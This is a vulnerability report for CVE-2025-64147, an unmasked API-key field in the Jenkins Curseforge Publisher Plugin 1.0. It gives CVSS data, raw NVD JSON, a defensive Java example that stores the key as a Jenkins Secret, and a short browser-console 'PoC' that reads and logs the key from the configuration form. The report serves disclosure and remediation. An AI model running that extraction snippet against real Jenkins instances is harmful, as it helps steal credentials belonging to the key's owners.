Security Vulnerability Report
CVE-2025-64147 (CVSS 4.3, MEDIUM)

Published: 2025-10-29 14:16:00
Last Modified: 2025-11-04 22:16:42

Description

Jenkins Curseforge Publisher Plugin 1.0 does not mask API Keys displayed on the job configuration form, increasing the potential for attackers to observe and capture them.

In practice this means the key is rendered into a plain text input on the job's configure page, so anyone who can open that form (a user with Job/Configure permission on the job, which is why the CVSS vector carries PR:L), anyone looking over that user's shoulder, or anyone with a screenshot or saved copy of the page can read the key verbatim. The record below classifies the weakness as CWE-311 (Missing Encryption of Sensitive Data). The integrity and availability scores are zero because the issue only discloses the key; what an attacker can do with it depends on the privileges of the CurseForge account it belongs to.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:jenkins:curseforge_publisher:1.0:*:*:*:*:jenkins:*:* - VULNERABLE
Jenkins Curseforge Publisher Plugin 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2025-64147 PoC - Information Disclosure via Page Inspection
// Steps to reproduce:
// 1. Navigate to the Jenkins job configuration page
//    (/job/<name>/configure; requires Job/Configure on that job).
// 2. Locate the Curseforge Publisher section.
// 3. Inspect the API Key input field in the browser dev tools.
// 4. The API key is visible as plaintext in the input's 'value' attribute.

// Example JavaScript to extract the API key from the loaded form.
// "_.apiKey" follows the usual Jenkins naming for a form field called
// apiKey; confirm the real input name against the page before relying on it.
(function () {
  var apiKeyInput = document.querySelector('input[name="_.apiKey"]');
  if (apiKeyInput) {
    console.log('Exposed API Key:', apiKeyInput.value);
    return apiKeyInput.value;
  }
  console.log('No input named _.apiKey found on this page');
})();

// Or simply view the page source to find the unmasked field:
// <input type="text" name="_.apiKey" value="ACTUAL_API_KEY_HERE" />
// A masked field (Jenkins <f:password> bound to a hudson.util.Secret) is
// rendered as a password input whose value is the encrypted form of the
// secret rather than the plaintext:
// <input type="password" name="_.apiKey" value="{ENCRYPTED_VALUE}" />
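The fix for this class of bug on the plugin side is to stop holding the key as a plain String bound to a text box. The following is an added example written for this page, not the Curseforge Publisher plugin's own source: a minimal Jenkins publisher that keeps its API key as hudson.util.Secret and renders it with the form library's password control. The package, class names and display name are hypothetical; the field name apiKey mirrors the PoC above.

```java
// Added example, not the Curseforge Publisher plugin's code.
// Hypothetical package and class names.
package io.example.jenkins;

import hudson.Extension;
import hudson.model.AbstractProject;
import hudson.tasks.BuildStepDescriptor;
import hudson.tasks.BuildStepMonitor;
import hudson.tasks.Publisher;
import hudson.tasks.Recorder;
import hudson.util.Secret;
import org.kohsuke.stapler.DataBoundConstructor;

/*
 * Matching Jelly form, at
 * src/main/resources/io/example/jenkins/ExamplePublisher/config.jelly:
 *
 *   <j:jelly xmlns:j="jelly:core" xmlns:f="/lib/form">
 *     <f:entry title="API Key" field="apiKey">
 *       <f:password/>          <!-- vulnerable form used <f:textbox/> -->
 *     </f:entry>
 *   </j:jelly>
 *
 * <f:password> renders <input type="password"> and, for a Secret-typed
 * property, puts the encrypted value in the value attribute, so the
 * plaintext key never reaches the browser.
 */
public class ExamplePublisher extends Recorder {

    /*
     * Vulnerable pattern (what CVE-2025-64147 describes): a plain String
     * field bound to <f:textbox/>. The getter returns the plaintext and the
     * form library writes it into a type="text" value attribute.
     *
     *   private final String apiKey;
     *   public String getApiKey() { return apiKey; }
     */

    // Hardened pattern: Jenkins encrypts a Secret with the instance's master
    // key when it is saved to config.xml and only decrypts it on demand.
    private final Secret apiKey;

    @DataBoundConstructor
    public ExamplePublisher(Secret apiKey) {
        this.apiKey = apiKey;
    }

    // Bound to the form. Returning the Secret (not a String) is what lets
    // <f:password> show the encrypted value instead of the plaintext.
    public Secret getApiKey() {
        return apiKey;
    }

    // Decrypt only at the point of use, e.g. when building the upload
    // request. Secret.toString(null) returns "" rather than throwing.
    String apiKeyForRequest() {
        return Secret.toString(apiKey);
    }

    @Override
    public BuildStepMonitor getRequiredMonitorService() {
        return BuildStepMonitor.NONE;
    }

    @Extension
    public static final class DescriptorImpl extends BuildStepDescriptor<Publisher> {
        @Override
        public boolean isApplicable(Class<? extends AbstractProject> jobType) {
            return true;
        }

        @Override
        public String getDisplayName() {
            return "Example publisher (masked API key)";
        }
    }
}
```

Changing the field type from String to Secret in place keeps previously saved jobs loadable: Jenkins core's XStream converter for Secret reads the stored value with Secret.fromString, which accepts either an encrypted value or legacy plaintext, and the key is written back encrypted the next time the job is saved. Masking the form is the advertised fix for this CVE, not a complete defence: a user who already holds Job/Configure can still change the job to print the key into a build log, so the key should also be scoped to the least CurseForge privilege the publisher needs.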

References

https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3562 (Vendor Advisory)
http://www.openwall.com/lists/oss-security/2025/10/29/2 (oss-security announcement)
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-64147",
    "sourceIdentifier": "jenkinsci-cert@googlegroups.com",
    "published": "2025-10-29T14:15:59.553",
    "lastModified": "2025-11-04T22:16:41.597",
    "vulnStatus": "Modified",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Jenkins Curseforge Publisher Plugin 1.0 does not mask API Keys displayed on the job configuration form, increasing the potential for attackers to observe and capture them."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
            "baseScore": 4.3,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 1.4
        }
      ]
    },
    "weaknesses": [
      {
        "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
        "type": "Secondary",
        "description": [{"lang": "en", "value": "CWE-311"}]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:jenkins:curseforge_publisher:1.0:*:*:*:*:jenkins:*:*",
                "matchCriteriaId": "5AA75189-8898-4173-87E5-818B6D713C95"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://www.jenkins.io/security/advisory/2025-10-29/#SECURITY-3562",
        "source": "jenkinsci-cert@googlegroups.com",
        "tags": ["Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2025/10/29/2",
        "source": "af854a3a-2127-422b-91ae-364da2661108"
      }
    ]
  }
}